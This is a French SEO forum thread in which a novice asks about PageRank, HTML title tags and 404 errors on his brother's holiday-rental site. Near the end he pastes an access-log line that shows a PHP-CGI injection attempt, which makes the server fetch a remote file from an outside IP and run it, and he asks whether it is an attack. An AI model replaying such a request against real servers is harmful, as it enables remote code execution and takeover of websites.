Que se passe t-il ? j'aurais besoin de votre avis

Nouveau WRInaute
Bonjour,

Je fais des modifications sur le site de mon frère depuis à peu près 2 mois: www.gite-lareunion.com

Et aujourd'hui j'ai vu que le nombre de pages indexées et de BL avaient augmenté sur le site http://www.pagerank.fr/

Et là je vois que le PR2 c'est transformé en PR ?.

Es ce une pénalité où y a t-il une évolution du PR actuellement ?

Merci pour votre aide et avis sur ce site.
(PS: je ne suis que débutant, mais j'accepterais toutes les critiques :wink: )
Thierry

WRInaute impliqué
Salut,
Sur http://www.google-pr.net/ (j'ignore sa fiabilité), ton PR est toujours de 2. As-tu constaté des problèmes de positionnement sur certaines requêtes ? Sinon, peut-être un problème temporaire car je ne vois pas ce qui aurait pu causer une sanction...
Comme critique, c'est assez mineur en soi mais un code source plus propre serait très appréciable !
Il faudrait également définir des titres pour les pages autres que "l'accueil" (qui est en fait une page "tunnel", si ça s'appelle encore comme ça, qui ralentit la navigation et n'est pas optimisée pour le référencement)
à+

Nouveau WRInaute
Merci Schwarzer Stern pour ce lien que je ne connaissais pas. Oui il semble que le PR n'ai pas bougé sur ce site !
J'ai testé avec des URL de différent site et http://www.pagerank.fr/ fonctionne avec ces autres sites !
Ce que je ne comprend pas, c'est le "point d'interrogation" après le "PR" ?, j'ai déja vu certains nouveaux sites avec un PR "N/A" ou "0" mais pas de "PR ?".

1)Sinon qu'entends-tu par "un code source plus propre" ? en fait j'ai récupéré le code d'origine et je fais quelques modifs en fonction des nouvelles choses que j'apprends chaque jour :mrgreen:

2)En ce qui concerne les titres, j'ai mis des balises <meta name="Title" content=... sur chaque page ! ça ne va pas ?
En tout cas c'est intéressant ce que tu me dis puisque "l'outil pour les webmaster de google" me dit dans "Suggestions HTML"
qu'il y a 11 Balises title manquantes !!!!

Thierry :wink:

Nouveau WRInaute
Madrileño a dit:
Il y a une mise à jour du PageRank qui est un peu aléatoire pour le moment :
https://www.webrankinfo.com/forum/t/pagerank-mise-a-jour-15-09-10.133526/ . :|

Hier j'ai ajouté en haut de la page d'accueil, un lien vers un sujet qui n'a rien à voir avec l'hébergement en gite à la Réunion ! J'ai ajouté un lien vers une annonce pour vendre le corps de ferme de mon frère et aussi un lien pour nous, pour acheter une maison !

J'espère quand même ne pas avoir fait de bêtises en mélangeant 2 sujets différent. :oops:

WRInaute impliqué
LULU97 a dit:
1)Sinon qu'entends-tu par "un code source plus propre" ? en fait j'ai récupéré le code d'origine et je fais quelques modifs en fonction des nouvelles choses que j'apprends chaque jour :mrgreen:
Quelques astuces à apprendre (tout le monde en apprend chaque jour, je suis loin de te jeter la pierre) mais aussi quelques bases (là je te jette mh disons un caillou chou hibou genou) (oui bon je perds la tête moi trop de bière :oops: ) :
Dans les astuces :
- au moins ça à enlever :
Code:
<meta name="revisit-after" content="1 day"/>
<meta name="Robot" content="index,follow,all"/>
(pour l'un, pas pris en compte, pour l'autre, c'est la config par défaut si je ne m'abuse)
- Appeler les fichiers JS avant </body> pour un chargement plus rapide du reste de la page

Dans les "fondas" :
- valider le code avec l'outil du W3C (http://validator.w3.org : pense à ajouter un doctype en haut de page)
- séparer HTML du CSS
- éventuellement remplacer les tableaux par des div + css, un peu plus ardu au début mais bien plus aisé avec l'habitude

Enfin bon le code propre c'est un peu une manie chez moi mais ça permet d'alléger la page (non négligeable pour certains visiteurs, même Google prendrait la vitesse de chargement en compte dans son classement, à vérifier), c'est plus agréable à gérer pour le webmaster, ça te fera sûrement gagner du temps et surtout, tu progresseras sûrement plus vite avec. Ce n'est pas ça qui va améliorer le référencement, normalement.

LULU97 a dit:
2)En ce qui concerne les titres, j'ai mis des balises <meta name="Title" content=... sur chaque page ! ça ne va pas ?
En tout cas c'est intéressant ce que tu me dis puisque "l'outil pour les webmaster de google" me dit dans "Suggestions HTML"
qu'il y a 11 Balises title manquantes !!!!

Je pense que la meta title est inutile (à vérifier), à remplacer (ou compléter) par la balise <title>

Bon courage :)

Membre Honoré
Comme le précise le membre du forum juste avant vous pouvez continuer d'améliorer votre site.
Le mieux serait de créer un topic pour demander des conseils pour votre site.

Nouveau WRInaute
Merci,

Déjà, en ce qui concerne la bière c'est bon, il faut en abuser :mrgreen:

Bonne nouvelle : le PR? a été remplacé par PR2 donc pas de pénalité OUFFF
Donc mon problème de PR est résolu :D

Maintenant, je ne sais pas si je continu sur ce post ou si j'en ouvre un autre ?

En ce qui concerne le site:
1) je virerais sur toutes les pages les balises meta name= revisite-after et robot (j'avais utilisé un programme pour ça : generMtag par SimMaster mais si c'est pas utile ...)

2) le code JS de google analytic devait être avant </head> il me semble ? oui c'est ça! Si je le met à la fin avant </body> pour un chargement plus rapide de la page es ce que le script de "analytic va aimer ?
  • Collez ce code sur votre site.
    Copiez le code suivant, puis collez-le dans chaque page dont vous souhaitez effectuer le suivi, en le plaçant juste avant la balise de fermeture </head>.
    En savoir plus

3) J'ai essayé l'outil W3C et comme je ne suis pas conforme au XHTML et que ça risque d'être long à modifier, il me met plein d'erreurs de fermeture de commande.

4) HTML et CSS; il y a déjà un fichier css dans un répertoire ça ne suffit pas ?

5)les titres des pages!
Dois-je placer l'une ou l'autre des balises ci-dessous ou les deux ? Et si je met les deux ---> y aura-t il duplication du contenu ?
<title>Gite Manapany les Bains - Ile de la Réunion - accueil</title>
<meta name="Title" content="Gite Manapany les Bains - Ile de la Réunion - accueil"/>

Thierry

WRInaute impliqué
2) Tu utilises les 2 différences codes analytics ?? Enlève le second, celui avant </head> suffit.
3) Si tu estimes que ça va te prendre trop de temps pour différentes raisons (trop de pages à modifier, pas encore d'expérience avec le xHTML,...), ne te prend pas la tête avec pour l'instant mais garde ça en tête lorsque tu crées une nouvelle page ou fais le au fur et à mesure des mises à jour du site.
4) Pareil, c'est du fignolage, et en utilisant le même fichir externe CSS, tu peux déjà y insérer le contenu actuellement entre <style>...</style> voire simplifier des lignes comme :
Code:
<td width="180" align="left" bgcolor="#6DA71D"><div align="center" class="Style12"></div></td>
(en essayant de trouver des propriétés communes pour définir une classe par exemple, ou pour commencer doucement à au moins tout passer en CSS pour y voir plus clair pour une éventuelle séparation future :
Code:
<td style="width: 180px;background-color: #6DA71D;"><div class="Style12" style="text-align: center;"></div></td>
5) Je ne connaissais pas la balise meta title, mais j'ai lu sur ce forum qu'elle n'avait aucun intérêt. Tu la remplaces donc simplement par <title>.

Bon courage ;)

Nouveau WRInaute
Bonsoir Schwarzer Stern ;-)

2) google-site-verification c'est pour l'outil de google pour les webmaster
et le second c'est pour google analytic
Et effectivement c'est deux choses complémentaire que j'utilise pas totalement mais ça donne une idée des truc qui ne vont pas.

3)xHTML: je pense qu'il sera important dans un avenir proche mais pour le moment j'ai pas trop le temps de tout refaire.
Par contre c'est une bonne idée d'être conforme pour les nouvelles pages...

4)le css je n'y ai pas encore touché mais il faudra que je m'informe plus sur comment ça fonctionne, ça doit pas être compliqué ;-)

5)Et pour meta title et <title> je crois que je vais mettre les deux puisque je lis d'un coté que c'est pas utile et de l'autre que c'est utile

c'est à en perdre la boule tout ce code lol

déja minuit, merci pour l'aide et @ bientôt

bye Thierry

WRInaute impliqué
LULU97 a dit:
Bonsoir Schwarzer Stern ;-)

3)xHTML: je pense qu'il sera important dans un avenir proche mais pour le moment j'ai pas trop le temps de tout refaire.
Par contre c'est une bonne idée d'être conforme pour les nouvelles pages...
Oui, quand tias rien à faire. Franchement, c'est pas une priorité absolue.

4)le css je n'y ai pas encore touché mais il faudra que je m'informe plus sur comment ça fonctionne, ça doit pas être compliqué ;-)
Fonce dedans, ca va te révolutionner la façon dont tu construis des pages.

5)Et pour meta title et <title> je crois que je vais mettre les deux puisque je lis d'un coté que c'est pas utile et de l'autre que c'est utile
Une balise title et ca suffit, le meta_title sert à rien.
https://www.webrankinfo.com/forum/t/balises-title-et-meta-name-title.44832/

Membre Honoré
Les moteurs apprécient les sites optimisés pour les utilisateurs et il semble que votre site peut être mieux optimisé pour les utilisateurs. D'une manière générale il faut aussi éviter les sur-optimisations pour les utilisateurs et pour les moteurs et plus spécifiquement le référencement. Exemple avec le mot-clé :
Code:
qui est utilisé beaucoup de fois, les utilisateurs n'ont pas besoin d'avoir beaucoup de répétitions pour comprendre de quoi s'agit le site que vous présenter. Il faut savoir qu'il n'existe pas de densité idéale pour les mots-clés, il faut d'abord que le site soit intéressant pour les utilisateurs c'est ce que souhaitent aussi les moteurs puisqu'ils affichent les sites les plus utiles pour les utilisateurs et sachant que votre site est un e-commerce, il est important que le site soit optimisé pour les utilisateurs qui sont aussi vos potentiels clients et le côté commercial est aussi important pour les sites e-commerce.

Vous pouvez changer la page Sitemaps par un plan de site pour les utilisateurs et avoir un fichier Sitemaps correctement réalisé pour les moteurs en .xml par exemple. Vous pouvez vérifier la documentation officielle.

Merci à vous pour votre participation sur le forum en répondant aussi à d'autres topics ou remerciant les membres (lien).
C'est ce qui motive les membres et permet d'avoir un forum qui permet de faire évoluer les sites tous les jours.

Nouveau WRInaute
Bonsoir,
Vous allez pas me croire mais je souhaite que la mise à jour google ne soit pas pour demain :mrgreen:
Parce que je crois que j'ai encore du boulot et là je n'aurais pas le temps de tout corriger.

Je viens de trouver un add on sur firefox http://kgen.elitwork.com/ qui donne pas mal d'infos sur les répétitions de mot.

Hallucinant leur conseil :
Suggestion d'alternatives pour le mot : "gite"

Lorsqu'un mot est beaucoup trop présent dans un document, il peut-être judicieux de le remplacer par un autre qui a le même sens ou de simuler une faute de frappe afin de pondérer sa présence dans le document.
Synonymes

Aucun synonyme trouvé pour ce mot.
Fautes de frappe
Oubli de lettres

* ite
* gte
* gie
* git

Inversion de lettres

* igte
* gtie
* giet
* git

Double frappe d'une lettre

* ggite
* giite
* gitte
* gitee

Fautes de frappe courantes

* fite
* fitehite
* gute
* gutegote
* gire
* giregiye
* gitz
* gitzgitr

WRInaute accro
Faire des fautes exprès c'est autant de clients perdus.
Laisse tomber ton add-on.
Il y a pas mal de corrections de base à faire sans aller chercher des trucs douteux.

Nouveau WRInaute
nicogroup a dit:
Un PR de 2 en 2mois ???

comment t'as fais ?
Salut Nico,
je n'ai jamais fait un PR de 2 en 2 mois !
Le PR2 c'est transformé en "PR ?" puis le "PR ?" c'est transformé en PR2 et aujourd'hui le PR2 c'est encore transformé en "PR?".
+ un nouveau BL de validé.

Je n'ai pas le temps de faire les corrections que l'on m'a conseillé sur ce forum mais j'espère le faire rapidement.

@+ :wink:
Thierry

Nouveau WRInaute
Bonjour,

Je reviens presque 2 ans :D
Depuis quelque temps j’ai des erreur 404 dont je ne connais pas l'origine :cry: .
En regardant les statistiques sur OVH, par exemple il y a cette url qui est fausse, le «fr1 » devrait être en majuscule au lieu d'être en minuscule pour pointer sur quelque chose qui existe:
http://www.(monsite.com)/fr1/index.php

L’outils pour les webmasters de google m’a indiqué que le nombre d’erreur 404 avait augmentés et j’ai depuis une grosse pénalité sur le moteur de recherche google !!! Je ne suis même plus sur la première page « gite reunion »

voici des traces dans OVH:
64.90.38.101 www.gite-lareunion.com - [16/May/2012:10:00:21 +0200] "GET /fr1/index.php HTTP/1.0" 404 184 "-" "MagpieRSS/0.72 (+http://magpierss.sf.net)"
213.186.127.28 www.gite-lareunion.com - [16/May/2012:14:21:54 +0200] "GET /fr1/index.php HTTP/1.1" 404 184 "-" "Mozilla/5.0 (compatible; AhrefsBot/3.0; +http://ahrefs.com/robot/)"
38.111.147.83 www.gite-lareunion.com - [15/May/2012:08:00:01 +0200] "GET /fr1/index.php HTTP/1.0" 404 184 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
89.87.93.154 www.gite-lareunion.com - [01/May/2012:22:32:26 +0200] "GET /fr1/index.php HTTP/1.1" 404 184 "-" "Mozilla/5.0 (Windows NT 6.0; rv:11.0) Gecko/20100101 Firefox/11.0"

J’ai corrigé quelques erreurs dont l’origine été dans l’onglé « référencé par » mais là il n’y a rien pour m’aider.
En attendant j’ai fait une redirection "301" suivante mais je ne sais pas si ça suffira pour ne plus être pénalisé ? Ce que je voudrais c’est connaître l’origine et la corriger :

RewriteEngine on
RewriteRule ^fr1 FR1
RewriteRule ^ang ANG

MagpieRSS: je ne sais plus si je l'ai essayé un jours pour créer un flux RSS mais je crois que ça ne fonctionnait pas et si il reste quelque chose dans mon code je n'arrive pas à le retrouver.

Si vous avez une idée je suis preneur ;-)

Par avance merci

Nouveau WRInaute
Je viens peut être de trouver encore une autre solution:
J'ai rajouté dans le fichier robot.txt :
Code:
 Disallow: /fr1/
pour que personne n'utilise ce faux répertoire et pour ne plus avoir d'erreur 404.
c'est peut être mieux et plus simple mais je ne connais toujours pas l'origine du problème ?

Nouveau WRInaute
YES YES YESSSSSSSSSSSSSSSSSSS! :twisted:

j'ai trouvé, après 2 semaines de recherche (tous les soirs et les Wend) j'ai enfin trouvé l'origine de ces erreurs 404.
L'origine provient de mauvais référencements sur des annuaires effectué il y a plus d'un an.
Si cela vous arrive, voici ce que j'ai fait:

j'ai utilisé les "outils pour les webmaster".
cliquer sur "lien vers votre site",
cliquer sur "Votre contenu le plus référencé par le biais de liens" et surtout sur "plus"
et là j'ai trouvé un lien erroné.
cliquer sur ce lien puis sur le domaine et enfin vous verrez les liens directs vers la ou les pages où se trouvent vos erreurs de lien.

Espérant que cela aide d'autres novices en programmation comme moi et aussi espérant que la pénalité google soit retiré
@+
Thierry

Nouveau WRInaute
GREEEEE, le webmaster qui gère l'annuaire où il y a un mauvais lien 404 nous a répondu pas très gentiment:

Voici sa réponse: "Combien vous comptez me payer, si rien, oubliez moi merci"

Enfin ce qui m'inquiette c'est ce que j'ai retrouvé sur le serveur OVH à la suite de cet email:

Code:
95.9.91.99 adresse_SITE - [23/May/2012:12:29:03 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

Et d'après ce que j'ai lu sur ce truc, c'est qu'il essaie de pirater le site et d'insérer des choses dans le code. es ce vrai ? vous en pensez quoi ? ça me fait un peu flipper.

Par avance merci pour votre aide et vos avis :cry:
Thierry

WRInaute accro
Plutôt qu'un "disallow" il faudrait faire une redirection de ce répertoire vers ta page d'accueil, comme ça les erreurs disparaissent. Par ailleurs, si on cherche dans Google les urls de ton site avec le répertoire /FR1/, il y en a quand même une bonne tripotée, et qui existent. Alors ?

Je trouve que tu vas très vite dans ton "accusation". Est ce que les IP correspondent, déjà ? (tu peux voir celle de son mail). Ne crois tu pas qu'il peut aussi simplement s'agir d'un hasard ?

Nouveau WRInaute
Bonjour et merci Marie-Aude pour ta réponse,

En ce qui concerne la redirection, j’ai fait ça mais je ne dois pas avoir la bonne syntaxe puisque le chemin www.site/fr1/index.php se transforme en www.site/FR1/  et je voudrais plutôt www.site/

RewriteEngine on

RewriteRule /fr1 FR1

Le problème n’est pas FR1 (en majuscule) mais fr1 en minuscule qui n’existe pas et qui retournait une erreur 404 avant la redirection.

J’ai lu sur différent sites que le code que j’ai recopié ci-dessus pouvait « pirater » le site et c’est surtout ça qui m’inquiète et non l’identité de la personne qui l’a fait.

Je ne savais même pas qu’on pouvait avoir l’adresse ip d’un email et effectivement ça peut être un simple hasard, tu as raison.

Quoi qu’il en soit sais-tu si je peux rajouter quelque chose pour me protéger de ces attaques (de simple bien sur, je ne suis pas informaticien et je fais ça pour mon frère qui lui n’y connait rien du tout)

Merci pour tes conseils.

Thierry

➡️ Offre MyRankingMetrics ⬅️

pré-audit SEO gratuit avec RM Tech (+ avis d'expert)
coaching offert aux clients (avec Olivier Duffez ou Fabien Faceries)

Voir les détails ici

coaching SEO
Discussions similaires